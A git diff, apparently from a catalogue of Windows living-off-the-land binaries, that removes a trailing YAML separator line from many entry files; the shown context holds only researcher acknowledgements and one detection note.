b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml @@ -15,4 +15,3 @@ Full_Path: - Path: '%localappdata%\Whatsapp\Update.exe' Detection: - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process' ---- diff --git a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml index 2a93285..0ca821f 100644 --- a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml +++ b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml @@ -25,4 +25,3 @@ Acknowledgement: Handle: '@@vysecurity' - Person: Adam (Internals) Handle: '@Hexacorn' ---- diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml index a7aa5b5..df1e405 100644 --- a/yml/OSBinaries/AppInstaller.yml +++ b/yml/OSBinaries/AppInstaller.yml @@ -20,4 +20,3 @@ Resources: Acknowledgement: - Person: Wade Hickey Handle: '@notwhickey' ---- diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index dc4cf74..ee23cf7 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: cpl Handle: '@cpl3h' ---- diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index c0b81bd..245153c 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -34,4 +34,3 @@ Acknowledgement: Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ---- diff --git a/yml/OSBinaries/Atbroker.yml b/yml/OSBinaries/Atbroker.yml index 45ffc5f..78a9e50 100644 --- a/yml/OSBinaries/Atbroker.yml +++ b/yml/OSBinaries/Atbroker.yml @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- diff --git a/yml/OSBinaries/Bash.yml b/yml/OSBinaries/Bash.yml index 338a5d8..1a3a7b9 100644 --- a/yml/OSBinaries/Bash.yml +++ b/yml/OSBinaries/Bash.yml @@ -48,4 +48,3 @@ Acknowledgement: Handle: '@aionescu' - Person: Asif Matadar Handle: '@d1r4c' ---- diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index 9a6f56b..01a868b 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -56,4 +56,3 @@ Acknowledgement: Handle: '@carnal0wnage' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index eb2328d..fc183f6 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Ensar Samil Handle: '@sblmsrsn' ---- diff --git a/yml/OSBinaries/Certreq.yml b/yml/OSBinaries/Certreq.yml index 2d60a37..5f42615 100644 --- a/yml/OSBinaries/Certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ---- diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index be67802..2f937a5 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -75,4 +75,3 @@ Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Lior Adar ---- diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index c67db32..2ef701c 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: r0lan Handle: '@yeyint_mth' ---- diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 90ef75d..8c28840 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Cmdl32.yml b/yml/OSBinaries/Cmdl32.yml index 275827c..47a87c9 100644 --- a/yml/OSBinaries/Cmdl32.yml +++ b/yml/OSBinaries/Cmdl32.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 0f00d4e..247a27c 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -44,4 +44,3 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Nick Tyrer Handle: '@NickTyrer' ---- diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index 286db84..a433c69 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -29,4 +29,3 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' ---- diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 0ed5c87..cc27bc7 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -24,4 +24,3 @@ Acknowledgement: Handle: '@hexacorn' - Person: Wietze Handle: '@wietze' ---- diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 148aa25..6e71918 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 44d7da9..df6421b 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 7a09cee..3915a36 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index e5d5c20..d4a7935 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' ---- diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 46fc551..439948a 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Gal Kristal Handle: '@gal_kristal' ---- diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 075e45a..15988e1 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index ab75e5d..18d1979 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -35,4 +35,3 @@ Acknowledgement: Handle: '@tim8288' - Person: Hai Vaknin Handle: '@vakninhai' ---- diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index c9ba246..496f340 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 64703cb..96c1ead 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -32,4 +32,3 @@ Acknowledgement: Handle: '@dim0x69' - Person: Nikhil SamratAshok Handle: '@nikhil_mitt' ---- diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 6a3656a..6766bba 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -67,4 +67,3 @@ Acknowledgement: Handle: '@egre55' - Person: Mike Cary Handle: 'grayfold3d' ---- diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 2d5413d..f2ca7e4 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -31,4 +31,3 @@ Acknowledgement: Handle: '@enigma0x3' - Person: Matt Graeber Handle: '@mattifestation' ---- diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index 4574fe4..7921d6a 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -41,4 +41,3 @@ Acknowledgement: Handle: '@infosecn1nja' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index b38d467..60deb15 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -37,4 +37,3 @@ Acknowledgement: Handle: '@CyberRaiju' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 0b61161..a4a1519 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 4682e7c..eb682d0 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -54,4 +54,3 @@ Acknowledgement: Handle: '@VakninHai' - Person: Tamir Yehuda Handle: '@tim8288' ---- diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 22fcbb0..f3f67cd 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -45,4 +45,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index e84d9d9..4627f7c 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -28,4 +28,3 @@ Acknowledgement: Handle: '@Ocelotty6669' - Person: Malwrologist Handle: '@DissectMalware' ---- diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml index 8717c5b..bcc8caf 100644 --- a/yml/OSBinaries/FltMC.yml +++ b/yml/OSBinaries/FltMC.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Carlos Perez Handle: '@Carlos_Perez' ---- diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index b8761ad..8ccac01 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -34,4 +34,3 @@ Acknowledgement: Handle: '@vector_sec' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index c41136e..8f2f35b 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -38,4 +38,3 @@ Acknowledgement: Handle: '' - Person: Amit Serper Handle: '@0xAmit ' ---- diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index bd3ec8f..9675000 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -176,4 +176,3 @@ Resources: Acknowledgement: - Person: Jesus Galvez Handle: ---- diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 22ecd6a..ef8076e 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index ad15db6..bbf28b8 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -35,4 +35,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 2199ed5..806f00b 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -20,4 +20,3 @@ Resources: Acknowledgement: - Person: Wade Hickey Handle: '@notwhickey' ---- diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index f5a9e3d..931710b 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index aa591b1..c14b4a3 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index 98bf87c..d7187bd 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml @@ -32,4 +32,3 @@ Acknowledgement: Handle: '@VakninHai' - Person: Lior Adar Handle: ---- diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 894317c..c24b389 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Kyle Hanslovan Handle: '@kylehanslovan' ---- diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 4314b56..57d563b 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -39,4 +39,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index 9e2af4a..bb1d012 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Malwrologist Handle: '@DissectMalware' ---- diff --git a/yml/OSBinaries/Makecab.yml b/yml/OSBinaries/Makecab.yml index 7776867..40a8e0c 100644 --- a/yml/OSBinaries/Makecab.yml +++ b/yml/OSBinaries/Makecab.yml @@ -40,4 +40,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index a713768..1a184d3 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -36,4 +36,3 @@ Acknowledgement: Handle: '@gN3mes1s' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index 5d1f884..beaf2c0 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -56,4 +56,3 @@ Acknowledgement: Handle: '@FortyNorthSec' - Person: Bank Security Handle: '@Bank_Security' ---- diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 4bf70e8..c03a606 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -34,4 +34,3 @@ Acknowledgement: Handle: '@bohops' - Person: clem Handle: '@clavoillotte' ---- diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 33ac149..1707ea6 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -53,4 +53,3 @@ Acknowledgement: Handle: '' - Person: Cedric Handle: '@th3c3dr1c' ---- diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index abb2597..237c6cb 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -77,4 +77,3 @@ Acknowledgement: Handle: '@Cneelis' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 6b59858..c4ce1c1 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 7f65131..d8966f0 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 2f68ca7..43717d7 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -69,4 +69,3 @@ Acknowledgement: Handle: '@subtee' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index c9bc676..12722c9 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -51,4 +51,3 @@ Acknowledgement: Handle: '@netbiosX' - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ---- diff --git a/yml/OSBinaries/Netsh.yml b/yml/OSBinaries/Netsh.yml index b8f459c..b004ed2 100644 --- a/yml/OSBinaries/Netsh.yml +++ b/yml/OSBinaries/Netsh.yml @@ -34,4 +34,3 @@ Acknowledgement: Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ---- diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 7163688..c750fc0 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -36,4 +36,3 @@ Acknowledgement: Handle: '@subtee' - Person: Adam Handle: '@Hexacorn' ---- diff --git a/yml/OSBinaries/OfflineScannerShell.yml b/yml/OSBinaries/OfflineScannerShell.yml index fd85398..bcb0ad9 100644 --- a/yml/OSBinaries/OfflineScannerShell.yml +++ b/yml/OSBinaries/OfflineScannerShell.yml @@ -19,4 +19,3 @@ Detection: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/OneDriveStandaloneUpdater.yml b/yml/OSBinaries/OneDriveStandaloneUpdater.yml index b61a6e8..f49529e 100644 --- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml +++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml @@ -21,4 +21,3 @@ Resources: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index e61cf7b..be79c37 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -38,4 +38,3 @@ Acknowledgement: Handle: '@kylehanslovan' - Person: Fab Handle: '@0rbz_' ---- diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index e1bdc30..3bab933 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSBinaries/Pktmon.yml b/yml/OSBinaries/Pktmon.yml index 3a0e4af..99b89a6 100644 --- a/yml/OSBinaries/Pktmon.yml +++ b/yml/OSBinaries/Pktmon.yml @@ -31,4 +31,3 @@ Resources: Acknowledgement: - Person: Derek Johnson Handle: '' ---- diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 512ae99..d2ae315 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -22,4 +22,3 @@ Acknowledgement: Handle: '@LuxNoBulIshit' - Person: Avihay eldad Handle: '@aloneliassaf' ---- diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index c5deac3..957ae44 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index ed0405a..215a6e9 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml @@ -40,4 +40,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index 8dec4db..634c49d 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Psr.yml b/yml/OSBinaries/Psr.yml index ba36c95..56b9bd6 100644 --- a/yml/OSBinaries/Psr.yml +++ b/yml/OSBinaries/Psr.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Leon Rodenko Handle: '@L3m0nada' ---- diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml index 0caf9b6..459d579 100644 --- a/yml/OSBinaries/Rasautou.yml +++ b/yml/OSBinaries/Rasautou.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: FireEye Handle: '@FireEye' ---- diff --git a/yml/OSBinaries/Rdrleakdiag.yml b/yml/OSBinaries/Rdrleakdiag.yml index dedb202..77b13a0 100644 --- a/yml/OSBinaries/Rdrleakdiag.yml +++ b/yml/OSBinaries/Rdrleakdiag.yml @@ -41,4 +41,3 @@ Resources: Acknowledgement: - Person: Grzegorz Tworek Handle: '@0gtweet' ---- \ No newline at end of file diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index 3e0443b..b48e146 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml @@ -36,4 +36,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 5aa2b44..be27c04 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -38,4 +38,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index 3febc17..4ea0657 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Regini.yml b/yml/OSBinaries/Regini.yml index a19af48..717ddc5 100644 --- a/yml/OSBinaries/Regini.yml +++ b/yml/OSBinaries/Regini.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Eli Salem Handle: '@elisalem9' ---- diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index f3a98f2..df1653b 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ---- diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 5b8f856..33cee24 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 08a9e44..0056fdb 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -57,4 +57,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index 23a6d3f..aed6a0a 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml @@ -32,4 +32,3 @@ Resources: Acknowledgement: - Person: elceef Handle: '@elceef' ---- diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index 9f6d1bc..aa45372 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml @@ -39,4 +39,3 @@ Acknowledgement: Handle: '@splinter_code' - Person: ap Handle: '@decoder_it' ---- diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index bd8acc1..712c8c4 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -91,4 +91,3 @@ Acknowledgement: Handle: '@404death' - Person: Martin Ingesen Handle: '@Mrtn9' ---- diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index 0190d5c..e4f94aa 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 9409e42..9dff5c1 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index 3f6fcf3..337c4eb 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -36,4 +36,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index 4f3e5b5..7ad9afd 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 41def89..bf2a128 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -33,4 +33,3 @@ Resources: Acknowledgement: - Person: Nick Tyrer Handle: '@nicktyrer' ---- diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index e171778..480fdcb 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -31,4 +31,3 @@ Acknowledgement: Handle: '@hexacorn' - Person: Elliot Killick Handle: '@elliotkillick' ---- diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index 8d2b315..62a1bcf 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: Eral4m Handle: '@eral4m' ---- diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index ffca55a..2f145ff 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Nick Landers Handle: '@monoxgas' ---- diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 84f92ca..ff72cf1 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -35,4 +35,3 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Maxime Nadeau Handle: '@m_nad0' ---- diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index 2e8ee54..8c58cc1 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -37,4 +37,3 @@ Acknowledgement: Handle: '@oulusoyum' - Person: Matt Graeber Handle: '@mattifestation' ---- diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 47d177f..6f41d61 100644 --- 